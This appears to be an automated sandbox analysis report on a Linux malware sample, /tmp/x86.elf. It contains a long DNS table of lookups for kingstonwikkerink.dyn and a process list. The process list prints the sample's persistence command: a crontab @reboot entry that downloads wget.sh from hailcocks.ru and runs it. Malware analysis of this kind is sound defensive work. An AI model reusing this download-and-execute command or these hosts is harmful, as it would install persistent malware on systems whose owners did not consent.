                                                                    Oct 27, 2024 08:07:58.138880014 CET168.235.111.72192.168.2.230xb212No error (0)kingstonwikkerink.dyn91.149.238.18A (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:07:58.138880014 CET168.235.111.72192.168.2.230xb212No error (0)kingstonwikkerink.dyn86.107.100.80A (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:07:58.138880014 CET168.235.111.72192.168.2.230xb212No error (0)kingstonwikkerink.dyn81.29.149.178A (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:07:58.138880014 CET168.235.111.72192.168.2.230xb212No error (0)kingstonwikkerink.dyn31.13.248.89A (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:07:58.138880014 CET168.235.111.72192.168.2.230xb212No error (0)kingstonwikkerink.dyn91.149.218.232A (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:07:58.138880014 CET168.235.111.72192.168.2.230xb212No error (0)kingstonwikkerink.dyn193.233.193.45A (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:07:58.138880014 CET168.235.111.72192.168.2.230xb212No error (0)kingstonwikkerink.dyn194.87.198.29A (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:07:58.138880014 CET168.235.111.72192.168.2.230xb212No error (0)kingstonwikkerink.dyn213.182.204.57A (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:08:45.284497976 CET51.158.108.203192.168.2.230x3840No error (0)kingstonwikkerink.dyn31.13.248.89A (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:08:45.284497976 CET51.158.108.203192.168.2.230x3840No error (0)kingstonwikkerink.dyn194.87.198.29A (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:08:45.284497976 CET51.158.108.203192.168.2.230x3840No error (0)kingstonwikkerink.dyn88.151.195.22A (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:08:45.284497976 CET51.158.108.203192.168.2.230x3840No error (0)kingstonwikkerink.dyn213.182.204.57A (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:08:45.284497976 CET51.158.108.203192.168.2.230x3840No error (0)kingstonwikkerink.dyn91.149.218.232A (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:08:45.284497976 CET51.158.108.203192.168.2.230x3840No error (0)kingstonwikkerink.dyn193.233.193.45A (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:08:45.284497976 CET51.158.108.203192.168.2.230x3840No error (0)kingstonwikkerink.dyn195.133.92.51A (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:08:45.284497976 CET51.158.108.203192.168.2.230x3840No error (0)kingstonwikkerink.dyn86.107.100.80A (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:08:45.284497976 CET51.158.108.203192.168.2.230x3840No error (0)kingstonwikkerink.dyn185.82.200.181A (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:08:45.284497976 CET51.158.108.203192.168.2.230x3840No error (0)kingstonwikkerink.dyn91.149.238.18A (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:08:45.284497976 CET51.158.108.203192.168.2.230x3840No error (0)kingstonwikkerink.dyn81.29.149.178A (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:08:51.142954111 CET152.53.15.127192.168.2.230x3f44No error (0)kingstonwikkerink.dyn194.87.198.29A (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:08:51.142954111 CET152.53.15.127192.168.2.230x3f44No error (0)kingstonwikkerink.dyn195.133.92.51A (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:08:51.142954111 CET152.53.15.127192.168.2.230x3f44No error (0)kingstonwikkerink.dyn213.182.204.57A (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:08:51.142954111 CET152.53.15.127192.168.2.230x3f44No error (0)kingstonwikkerink.dyn86.107.100.80A (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:08:51.142954111 CET152.53.15.127192.168.2.230x3f44No error (0)kingstonwikkerink.dyn185.82.200.181A (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:08:51.142954111 CET152.53.15.127192.168.2.230x3f44No error (0)kingstonwikkerink.dyn88.151.195.22A (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:08:51.142954111 CET152.53.15.127192.168.2.230x3f44No error (0)kingstonwikkerink.dyn193.233.193.45A (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:08:51.142954111 CET152.53.15.127192.168.2.230x3f44No error (0)kingstonwikkerink.dyn91.149.218.232A (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:08:51.142954111 CET152.53.15.127192.168.2.230x3f44No error (0)kingstonwikkerink.dyn31.13.248.89A (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:08:51.142954111 CET152.53.15.127192.168.2.230x3f44No error (0)kingstonwikkerink.dyn91.149.238.18A (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:08:51.142954111 CET152.53.15.127192.168.2.230x3f44No error (0)kingstonwikkerink.dyn81.29.149.178A (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:08:57.524804115 CET168.235.111.72192.168.2.230xcad5No error (0)kingstonwikkerink.dyn31.13.248.89A (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:08:57.524804115 CET168.235.111.72192.168.2.230xcad5No error (0)kingstonwikkerink.dyn185.82.200.181A (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:08:57.524804115 CET168.235.111.72192.168.2.230xcad5No error (0)kingstonwikkerink.dyn88.151.195.22A (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:08:57.524804115 CET168.235.111.72192.168.2.230xcad5No error (0)kingstonwikkerink.dyn81.29.149.178A (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:08:57.524804115 CET168.235.111.72192.168.2.230xcad5No error (0)kingstonwikkerink.dyn86.107.100.80A (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:08:57.524804115 CET168.235.111.72192.168.2.230xcad5No error (0)kingstonwikkerink.dyn91.149.218.232A (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:08:57.524804115 CET168.235.111.72192.168.2.230xcad5No error (0)kingstonwikkerink.dyn91.149.238.18A (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:08:57.524804115 CET168.235.111.72192.168.2.230xcad5No error (0)kingstonwikkerink.dyn213.182.204.57A (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:08:57.524804115 CET168.235.111.72192.168.2.230xcad5No error (0)kingstonwikkerink.dyn195.133.92.51A (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:08:57.524804115 CET168.235.111.72192.168.2.230xcad5No error (0)kingstonwikkerink.dyn193.233.193.45A (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:08:57.524804115 CET168.235.111.72192.168.2.230xcad5No error (0)kingstonwikkerink.dyn194.87.198.29A (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:09:03.444981098 CET65.21.1.106192.168.2.230xde20No error (0)kingstonwikkerink.dyn81.29.149.178A (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:09:03.444981098 CET65.21.1.106192.168.2.230xde20No error (0)kingstonwikkerink.dyn88.151.195.22A (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:09:03.444981098 CET65.21.1.106192.168.2.230xde20No error (0)kingstonwikkerink.dyn91.149.218.232A (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:09:03.444981098 CET65.21.1.106192.168.2.230xde20No error (0)kingstonwikkerink.dyn91.149.238.18A (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:09:03.444981098 CET65.21.1.106192.168.2.230xde20No error (0)kingstonwikkerink.dyn31.13.248.89A (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:09:03.444981098 CET65.21.1.106192.168.2.230xde20No error (0)kingstonwikkerink.dyn193.233.193.45A (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:09:03.444981098 CET65.21.1.106192.168.2.230xde20No error (0)kingstonwikkerink.dyn194.87.198.29A (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:09:03.444981098 CET65.21.1.106192.168.2.230xde20No error (0)kingstonwikkerink.dyn86.107.100.80A (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:09:03.444981098 CET65.21.1.106192.168.2.230xde20No error (0)kingstonwikkerink.dyn213.182.204.57A (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:09:03.444981098 CET65.21.1.106192.168.2.230xde20No error (0)kingstonwikkerink.dyn195.133.92.51A (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:09:03.444981098 CET65.21.1.106192.168.2.230xde20No error (0)kingstonwikkerink.dyn185.82.200.181A (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:09:09.494154930 CET168.235.111.72192.168.2.230x1285No error (0)kingstonwikkerink.dyn193.233.193.45A (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:09:09.494154930 CET168.235.111.72192.168.2.230x1285No error (0)kingstonwikkerink.dyn81.29.149.178A (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:09:09.494154930 CET168.235.111.72192.168.2.230x1285No error (0)kingstonwikkerink.dyn31.13.248.89A (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:09:09.494154930 CET168.235.111.72192.168.2.230x1285No error (0)kingstonwikkerink.dyn195.133.92.51A (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:09:09.494154930 CET168.235.111.72192.168.2.230x1285No error (0)kingstonwikkerink.dyn213.182.204.57A (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:09:09.494154930 CET168.235.111.72192.168.2.230x1285No error (0)kingstonwikkerink.dyn86.107.100.80A (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:09:09.494154930 CET168.235.111.72192.168.2.230x1285No error (0)kingstonwikkerink.dyn185.82.200.181A (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:09:09.494154930 CET168.235.111.72192.168.2.230x1285No error (0)kingstonwikkerink.dyn88.151.195.22A (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:09:09.494154930 CET168.235.111.72192.168.2.230x1285No error (0)kingstonwikkerink.dyn91.149.218.232A (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:09:09.494154930 CET168.235.111.72192.168.2.230x1285No error (0)kingstonwikkerink.dyn91.149.238.18A (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:09:09.494154930 CET168.235.111.72192.168.2.230x1285No error (0)kingstonwikkerink.dyn194.87.198.29A (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:09:25.546974897 CET80.152.203.134192.168.2.230x2fa7No error (0)kingstonwikkerink.dyn31.13.248.89A (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:09:25.546974897 CET80.152.203.134192.168.2.230x2fa7No error (0)kingstonwikkerink.dyn193.233.193.45A (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:09:25.546974897 CET80.152.203.134192.168.2.230x2fa7No error (0)kingstonwikkerink.dyn213.182.204.57A (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:09:25.546974897 CET80.152.203.134192.168.2.230x2fa7No error (0)kingstonwikkerink.dyn91.149.238.18A (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:09:25.546974897 CET80.152.203.134192.168.2.230x2fa7No error (0)kingstonwikkerink.dyn88.151.195.22A (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:09:25.546974897 CET80.152.203.134192.168.2.230x2fa7No error (0)kingstonwikkerink.dyn81.29.149.178A (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:09:25.546974897 CET80.152.203.134192.168.2.230x2fa7No error (0)kingstonwikkerink.dyn91.149.218.232A (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:09:25.546974897 CET80.152.203.134192.168.2.230x2fa7No error (0)kingstonwikkerink.dyn195.133.92.51A (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:09:25.546974897 CET80.152.203.134192.168.2.230x2fa7No error (0)kingstonwikkerink.dyn86.107.100.80A (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:09:25.546974897 CET80.152.203.134192.168.2.230x2fa7No error (0)kingstonwikkerink.dyn185.82.200.181A (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:09:25.546974897 CET80.152.203.134192.168.2.230x2fa7No error (0)kingstonwikkerink.dyn194.87.198.29A (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:09:31.634928942 CET51.158.108.203192.168.2.230x43cbNo error (0)kingstonwikkerink.dyn91.149.238.18A (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:09:31.634928942 CET51.158.108.203192.168.2.230x43cbNo error (0)kingstonwikkerink.dyn81.29.149.178A (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:09:31.634928942 CET51.158.108.203192.168.2.230x43cbNo error (0)kingstonwikkerink.dyn31.13.248.89A (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:09:31.634928942 CET51.158.108.203192.168.2.230x43cbNo error (0)kingstonwikkerink.dyn194.87.198.29A (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:09:31.634928942 CET51.158.108.203192.168.2.230x43cbNo error (0)kingstonwikkerink.dyn88.151.195.22A (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:09:31.634928942 CET51.158.108.203192.168.2.230x43cbNo error (0)kingstonwikkerink.dyn213.182.204.57A (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:09:31.634928942 CET51.158.108.203192.168.2.230x43cbNo error (0)kingstonwikkerink.dyn91.149.218.232A (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:09:31.634928942 CET51.158.108.203192.168.2.230x43cbNo error (0)kingstonwikkerink.dyn193.233.193.45A (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:09:31.634928942 CET51.158.108.203192.168.2.230x43cbNo error (0)kingstonwikkerink.dyn195.133.92.51A (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:09:31.634928942 CET51.158.108.203192.168.2.230x43cbNo error (0)kingstonwikkerink.dyn86.107.100.80A (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:09:31.634928942 CET51.158.108.203192.168.2.230x43cbNo error (0)kingstonwikkerink.dyn185.82.200.181A (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:09:37.941864967 CET217.160.70.42192.168.2.230xfd4cNo error (0)kingstonwikkerink.dyn91.149.238.18A (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:09:37.941864967 CET217.160.70.42192.168.2.230xfd4cNo error (0)kingstonwikkerink.dyn88.151.195.22A (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:09:37.941864967 CET217.160.70.42192.168.2.230xfd4cNo error (0)kingstonwikkerink.dyn193.233.193.45A (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:09:37.941864967 CET217.160.70.42192.168.2.230xfd4cNo error (0)kingstonwikkerink.dyn195.133.92.51A (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:09:37.941864967 CET217.160.70.42192.168.2.230xfd4cNo error (0)kingstonwikkerink.dyn81.29.149.178A (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:09:37.941864967 CET217.160.70.42192.168.2.230xfd4cNo error (0)kingstonwikkerink.dyn86.107.100.80A (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:09:37.941864967 CET217.160.70.42192.168.2.230xfd4cNo error (0)kingstonwikkerink.dyn194.87.198.29A (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:09:37.941864967 CET217.160.70.42192.168.2.230xfd4cNo error (0)kingstonwikkerink.dyn91.149.218.232A (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:09:37.941864967 CET217.160.70.42192.168.2.230xfd4cNo error (0)kingstonwikkerink.dyn213.182.204.57A (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:09:37.941864967 CET217.160.70.42192.168.2.230xfd4cNo error (0)kingstonwikkerink.dyn31.13.248.89A (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:09:37.941864967 CET217.160.70.42192.168.2.230xfd4cNo error (0)kingstonwikkerink.dyn185.82.200.181A (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:09:44.262546062 CET185.181.61.24192.168.2.230x2608No error (0)kingstonwikkerink.dyn91.149.218.232A (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:09:44.262546062 CET185.181.61.24192.168.2.230x2608No error (0)kingstonwikkerink.dyn81.29.149.178A (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:09:44.262546062 CET185.181.61.24192.168.2.230x2608No error (0)kingstonwikkerink.dyn195.133.92.51A (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:09:44.262546062 CET185.181.61.24192.168.2.230x2608No error (0)kingstonwikkerink.dyn91.149.238.18A (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:09:44.262546062 CET185.181.61.24192.168.2.230x2608No error (0)kingstonwikkerink.dyn213.182.204.57A (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:09:44.262546062 CET185.181.61.24192.168.2.230x2608No error (0)kingstonwikkerink.dyn86.107.100.80A (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:09:44.262546062 CET185.181.61.24192.168.2.230x2608No error (0)kingstonwikkerink.dyn185.82.200.181A (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:09:44.262546062 CET185.181.61.24192.168.2.230x2608No error (0)kingstonwikkerink.dyn88.151.195.22A (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:09:44.262546062 CET185.181.61.24192.168.2.230x2608No error (0)kingstonwikkerink.dyn193.233.193.45A (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:09:44.262546062 CET185.181.61.24192.168.2.230x2608No error (0)kingstonwikkerink.dyn194.87.198.29A (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:09:44.262546062 CET185.181.61.24192.168.2.230x2608No error (0)kingstonwikkerink.dyn31.13.248.89A (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:09:50.143531084 CET185.181.61.24192.168.2.230x73abNo error (0)kingstonwikkerink.dyn91.149.218.232A (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:09:50.143531084 CET185.181.61.24192.168.2.230x73abNo error (0)kingstonwikkerink.dyn31.13.248.89A (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:09:50.143531084 CET185.181.61.24192.168.2.230x73abNo error (0)kingstonwikkerink.dyn86.107.100.80A (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:09:50.143531084 CET185.181.61.24192.168.2.230x73abNo error (0)kingstonwikkerink.dyn213.182.204.57A (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:09:50.143531084 CET185.181.61.24192.168.2.230x73abNo error (0)kingstonwikkerink.dyn194.87.198.29A (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:09:50.143531084 CET185.181.61.24192.168.2.230x73abNo error (0)kingstonwikkerink.dyn81.29.149.178A (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:09:50.143531084 CET185.181.61.24192.168.2.230x73abNo error (0)kingstonwikkerink.dyn195.133.92.51A (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:09:50.143531084 CET185.181.61.24192.168.2.230x73abNo error (0)kingstonwikkerink.dyn88.151.195.22A (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:09:50.143531084 CET185.181.61.24192.168.2.230x73abNo error (0)kingstonwikkerink.dyn91.149.238.18A (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:09:50.143531084 CET185.181.61.24192.168.2.230x73abNo error (0)kingstonwikkerink.dyn193.233.193.45A (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:09:50.143531084 CET185.181.61.24192.168.2.230x73abNo error (0)kingstonwikkerink.dyn185.82.200.181A (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:09:56.151252985 CET185.181.61.24192.168.2.230x860No error (0)kingstonwikkerink.dyn86.107.100.80A (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:09:56.151252985 CET185.181.61.24192.168.2.230x860No error (0)kingstonwikkerink.dyn193.233.193.45A (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:09:56.151252985 CET185.181.61.24192.168.2.230x860No error (0)kingstonwikkerink.dyn31.13.248.89A (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:09:56.151252985 CET185.181.61.24192.168.2.230x860No error (0)kingstonwikkerink.dyn195.133.92.51A (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:09:56.151252985 CET185.181.61.24192.168.2.230x860No error (0)kingstonwikkerink.dyn185.82.200.181A (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:09:56.151252985 CET185.181.61.24192.168.2.230x860No error (0)kingstonwikkerink.dyn91.149.238.18A (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:09:56.151252985 CET185.181.61.24192.168.2.230x860No error (0)kingstonwikkerink.dyn81.29.149.178A (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:09:56.151252985 CET185.181.61.24192.168.2.230x860No error (0)kingstonwikkerink.dyn88.151.195.22A (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:09:56.151252985 CET185.181.61.24192.168.2.230x860No error (0)kingstonwikkerink.dyn194.87.198.29A (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:09:56.151252985 CET185.181.61.24192.168.2.230x860No error (0)kingstonwikkerink.dyn91.149.218.232A (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:09:56.151252985 CET185.181.61.24192.168.2.230x860No error (0)kingstonwikkerink.dyn213.182.204.57A (IP address)IN (0x0001)false

                                                                    System Behavior

                                                                    Start time (UTC):07:07:56
                                                                    Start date (UTC):27/10/2024
                                                                    Path:/tmp/x86.elf
                                                                    Arguments:/tmp/x86.elf
                                                                    File size:95576 bytes
                                                                    MD5 hash:bb9275394716c60d1941432c7085ca13

                                                                    Start time (UTC):07:07:56
                                                                    Start date (UTC):27/10/2024
                                                                    Path:/tmp/x86.elf
                                                                    Arguments:-
                                                                    File size:95576 bytes
                                                                    MD5 hash:bb9275394716c60d1941432c7085ca13

                                                                    Start time (UTC):07:07:56
                                                                    Start date (UTC):27/10/2024
                                                                    Path:/bin/sh
                                                                    Arguments:sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"
                                                                    File size:129816 bytes
                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                    Start time (UTC):07:07:56
                                                                    Start date (UTC):27/10/2024
                                                                    Path:/bin/sh
                                                                    Arguments:-
                                                                    File size:129816 bytes
                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                    Start time (UTC):07:07:56
                                                                    Start date (UTC):27/10/2024
                                                                    Path:/bin/sh
                                                                    Arguments:-
                                                                    File size:129816 bytes
                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                    Start time (UTC):07:07:56
                                                                    Start date (UTC):27/10/2024
                                                                    Path:/usr/bin/crontab
                                                                    Arguments:crontab -l
                                                                    File size:43720 bytes
                                                                    MD5 hash:66e521d421ac9b407699061bf21806f5

                                                                    Start time (UTC):07:07:56
                                                                    Start date (UTC):27/10/2024
                                                                    Path:/bin/sh
                                                                    Arguments:-
                                                                    File size:129816 bytes
                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                    Start time (UTC):07:07:56
                                                                    Start date (UTC):27/10/2024
                                                                    Path:/usr/bin/crontab
                                                                    Arguments:crontab -
                                                                    File size:43720 bytes
                                                                    MD5 hash:66e521d421ac9b407699061bf21806f5

                                                                    Start time (UTC):07:07:56
                                                                    Start date (UTC):27/10/2024
                                                                    Path:/tmp/x86.elf
                                                                    Arguments:-
                                                                    File size:95576 bytes
                                                                    MD5 hash:bb9275394716c60d1941432c7085ca13